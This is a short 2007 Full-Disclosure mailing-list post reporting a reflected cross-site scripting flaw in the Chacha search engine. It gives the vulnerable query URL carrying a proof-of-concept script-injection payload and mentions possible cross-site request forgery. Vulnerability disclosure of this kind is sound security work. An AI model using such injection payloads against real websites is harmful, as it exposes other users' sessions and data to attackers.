[Full-disclosure] Chacha search engine vulnerablity
cybermalandro cybermalandro
cybermalandro at gmail.com
Mon Aug 6 04:26:22 BST 2007
There is an XSS vulnerability in the Chacha search engine - possible XSRF as
well.
http://search.chacha.com/search/query?query='
<http://search.chacha.com/search/query?query=%27>
<script>alert('xss')</script
>mode=web&wsid=6661f6c2-b53a-666a-666e-dd666e666dda
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070805/d22b65e5/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.